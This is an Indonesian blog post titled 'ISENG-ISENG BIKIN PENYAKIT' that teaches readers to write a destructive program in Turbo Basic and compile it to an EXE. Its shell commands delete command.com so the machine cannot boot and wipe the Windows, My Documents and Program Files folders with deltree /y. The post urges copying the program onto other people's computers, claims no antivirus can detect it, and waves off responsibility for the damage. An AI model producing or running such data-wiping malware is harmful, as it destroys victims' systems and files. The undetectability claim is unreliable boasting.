Sabtu, 08 Mei 2010

ISENG-ISENG BIKIN PENYAKIT


Cara membuat program penyakit (SEJENIS Virus)

- Download Turbo Basic v1.0

Membuat program penyakit kom (sejenis virus) merupakan keinginan hacker - hecker pemula , tp lo yang mau coba,harus bisa bahasa pemograman, masalh nih..lo yang kg bisa jangan berkecil hati dulu,karena saat ini gw mau kasih tips dan triks..yang simple ets..!!tp nih virus..yang satu nih termasuk mematikan jangan anggap remeh..

gw kg ngajarin ya cma bgi-bagi tips...

yg pertama x skill loh butuhin lo blajar dasar DOSnih kudu harus jangan sampai kg klu mau coba,soalnya tanpa yg ni lo ngak akan bisa berkarya menciptakan penyakit yg dahsyat, tp klu lo kg bisa jga..kbgtan loh..tp buat yg kg bisa copy paste ja deh jaman dah makin cangih kok. serbah instan , lo cukup Downlod bahasa pemograman yg bakal lo pakai adalah Turbo Basic v1.0, lo dapat mendownloadnya di Google.

Diatas adalah tampilan Turbo Basic, jika lo kg ngerti pemograman Turbo Basic maka lo, masuk ke Edit lalu lo tulis Source Code program perusak.

shell "Perintah DOS"

dengan diawali kata shell maka lo dapat menjalankan perintah DOS pada program, misal lo membuat :

shell "c:"
shell "cd\"
shell "del command.com"

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, contoh yang lain.

shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"

Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ? EXTRIME BGT KAN...

Setelah lo selesai membuat programnya maka lo save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu lo enter, maka source code tersebut akan menjadi file EXE.

Jika file EXE tersebut dijalankan maka komputer lo akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan lo inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi lo bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows,wkkwkwkwkwkwk...EXTRIME BGT KAN...

Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.

*Segala Kerusakan / error / pada komputer orang adalah tanggung jawab lo ya.. !
* yang lo pelajari dan lo lakukan adalah Bukan tanggung jawab gw ya..pah lagi locoba pake komputer sendiri..

WARNING : DOSA DITANGGUNG MASING-MASING

Sumber :
Yogya Family Code

0 komentar:

Posting Komentar

klik



Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Blogger Templates